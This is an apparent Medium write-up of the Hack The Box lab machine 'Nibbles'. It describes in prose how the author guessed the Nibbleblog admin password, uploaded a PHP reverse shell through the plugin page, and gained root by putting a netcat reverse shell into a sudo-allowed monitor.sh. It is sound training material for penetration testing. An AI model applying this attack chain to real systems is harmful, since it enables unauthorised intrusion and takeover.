Hack The Box — Nibbles
Nibbles is a Easy Linux box on Hack The Box and also OSCP like.Here we get Remote Code Execution on a CMS called Nibbleblog and privilege escalate using sudo.
ENUMERATION
We find port 80 and 22 are open.The source code of the default homepage on mort 80 hints us to check out the /nibbleblog directory
On /nibbleblog we discover a CMS where we can see posts and at the botton right it shows the name of the CMS as nibbleblog however we dont know it’s version yet and are also unable to find the login page.
Lets run dirsearch to find hidden directories.
The /README directory reveals crutial details about the Nibblelog CMS such as its version whicg is 4.0.3 which can help us find exploits later.
Make sure to check out other files and directories as well to check for any useful info.(I remember finding username “admin” in one of the directories)
We don’t find anything else in the directories other than files and configurations of the CMS which is running.I was unable to find any admin login page as well.Lets look for exploit for the version of Nibbleblog.
Out of many exploits which were almost same, we find one written in python on github-https://github.com/dix0nym/CVE-2015-6967/blob/main/exploit.py
See the image below. If you read its code carefully, you will notice that it tries to open a directory called /admin.php .Basically we find that the admin login page is located in admin.php and not /admin moreover, after reading the python code, i found that the code is not doing much.It is simply going to admin.php which is the login page using the credentails we supply, then it is going to my images folder and uploading a reverse shell. (This can also be done manually by hand)
Upon further research using google, i found this useful blog giving step by step guide on how to get reverse shell from Nibbleblog-https://wikihak.com/how-to-upload-a-shell-in-nibbleblog-4-0-3/
If you look at the image below carefully, The url seems to have admin.php which is another hint for the admin login page.
SO Finally lets log in to the admin login page at /nibbleblog/admin.php
I tried admin:admin,admin:root,admin:password, admin:nibbles and it finally worked!!! (To be honest, i got the password as a spoiler while using google.This Nibbleblog is a custom made CMS for this machine on HackTheBox called Nibbles.So while using google, i was getting tons of hints of this machine and google was also showing up writeups.)
Anyways, you can also bruteforce the password using rockyou.txt wordlist as the password is also contained there.
We are in!!! Go to > PLUGINS
and here we can upload our php reverse shell(you can download it from pentestmonkey github repo)
After the reverse shell has been uploaded, you have to visit the directory shown below, in order to locate the reverse shell file.(i found this location by reading the blog i had shared above.)
Start a netcat listener and click on image.php which will execute the rever shell and give us a connection on netcat.
I ran the python pty command to stablize the shell however python was not present in the box.When i ran sudo -l to see what command i can run as root,i found a executable file called monitor.sh
I headed towards the location of the monitor.sh file and saw that there is a personal.zip file which i unzipped using the unzip command.
I ran ls -la in the directory where monitor.sh was located to see the permissions of monitor.sh file. We can read,write,execute and have full permissions on it.Great ! all we need to do is change the contents of this file and run it as sudo.
I tried to see whats insde the file and it seemed like some server health monitoring script.Anyways who cares ….lets go with our plan.
I put a one liner netcat reverse shell in monitor.sh (you can find it in pentest monkey website)
As you can see above, i put the netcat reverse shell in monitor.sh and finally ran it using sudo(since we are allowed to run monitor.sh as root without any password.)
On our netcat listener We get a shell as root !!!
DO NOTE: I had initially tried using the rootbash method instead of using netcat reverse shell.If you havent heard about it, read this info from my notes
However it did not work in our case because the monitor.sh file did not have SUID bit set.When i ran ls -la command, the permission did not start with srwx- it started with rwx meaning it was missing SUID bit set.
CONCLUSION
Other than the part of finding the admin login page, I found this box pretty easy and fun.I hope you learned from this writeup.Make sure you follow me here on Medium for more such OSCP like writeups. -ZEUS
